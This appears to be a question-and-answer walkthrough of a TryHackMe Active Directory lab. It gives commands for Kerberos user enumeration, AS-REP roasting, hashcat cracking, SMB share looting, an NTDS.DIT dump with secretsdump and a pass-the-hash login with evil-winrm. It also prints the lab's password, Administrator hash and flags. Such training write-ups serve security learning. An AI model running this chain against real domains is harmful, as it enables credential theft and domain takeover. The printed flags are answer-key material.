Intro Deploy The Machine

To access the Virtual Machine, you will need to first connect to our network using OpenVPN. Here is a mini walkthrough of getting connected.

No answer needed

Return to your access page. You can verify you are connected by looking on your access page. Refresh the page. You should see a green tick next to Connected. It will also show you your internal IP address.

No answer needed

Alternatively, you can deploy the In-Browser Kali or Attack Box and automatically be connected to the TryHackMe Network.

No answer needed

Once connected to the VPN, deploy the machine and get hacking!

No answer needed

Intro Setup

Install Impacket, Bloodhound and Neo4j

No answer needed

Enumeration Welcome to Attacktive Directory

What tool will allow us to enumerate port 139/445?

enum4linux

What is the NetBIOS-Domain Name of the machine?

Run enum4linux IP and look for the domain name.

THM-AD

What invalid TLD do people commonly use for their Active Directory Domain?

Run nmap -A -p- IP and look for Domain and Computernames in the results.

.local

Enumeration Enumerating Users via Kerberos

What command within Kerbrute will allow us to enumerate valid usernames?

userenum

What notable account is discovered? (These should jump out at you)

Run kerbrute userenum --dc=IP -d=spookysec.local. userlist.txt. svc-admin

What is the other notable account is discovered? (These should jump out at you)

backup

Exploitation Abusing Kerberos

We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?

Save all names gathered in the enumeration into a file. Run python3 GetNPUsers.py -no-pass -usersfile usernames -dc-ip IP spookysec.local/

svc-admin

Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)

Kerberos 5, etype 23, AS-REP

Now crack the hash with the modified password list provided, what is the user accounts password?

Run hashcat -m 18200 hash.txt passwords.txt. management2005

Enumeration Back to the Basics

What utility can we use to map remote SMB shares?

smbclient

Which option will list shares?

-L

How many remote shares is the server listing?

Run `smbclient -L IP -U "svc-admin" and enter the password when promted

6

There is one particular share that we have access to that contains a text file. Which share is it?

Run smbclient ////IP//SHARE -U "svc-admin" and enter ls after you logged in to find the share with the textfile.

backup

What is the content of the file

Run more backup_credentials.txt

YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

Decoding the contents of the file, what is the full contents?

Paste the content in a file and run base64 FILE -d

Domain Privilege Escalation Elevating Privileges within the Domain

What method allowed us to dump NTDS.DIT?

Run python3 secretsdump.py spookysec.local/backup:backup251786@IP DRSUAPI

What is the Administrators NTLM hash?

0e0363213e37b94221497260b0bcb4fc

What method of attack could allow us to authenticate as the user without the password?

Pass the Hash

Using a tool called Evil-WinRM what option will allow us to use a hash?

-h

Flag Submission Flag Submission Panel

svc-admin

Run evil-winrm -i IP -u Administrator -H HASH. After you are logged-in you can access the flag by using cat /Users/svc-admin/Desktop/user.txt.txt.

TryHackMe{K3rb3r0s_Pr3_4uth}

backup

Run cat /Users/backup/Desktop/PrivEsc.txt.

TryHackMe{B4ckM3UpSc0tty!}

Administrator

Run cat /Users/Administrator/Desktop/root.txt.

TryHackMe{4ctiveD1rectoryM4st3r}